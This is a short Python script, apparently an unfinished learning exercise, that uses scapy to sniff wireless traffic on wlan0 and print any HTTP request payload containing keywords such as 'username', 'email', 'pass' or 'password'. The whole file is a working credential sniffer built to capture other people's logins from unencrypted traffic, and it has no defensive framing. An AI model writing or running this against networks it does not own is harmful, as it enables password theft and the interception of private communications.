#!/usr/bin/env python3


#it's not end version

import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
    scapy.sniff(iface = interface, store = False, prn = process_sniffed_packet)

def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        if packet.haslayer(scapy.Raw):
            load = str(packet[scapy.Raw].load)
            keywords = ["username","Username","user","User","login","Login","email","e-mail","E-mail","Email","Password","password","pass","passwd","Pass","Passwd"]
            for keyword in keywords:
                if keyword in load:
                    print(load)
                    break
            

sniff("wlan0")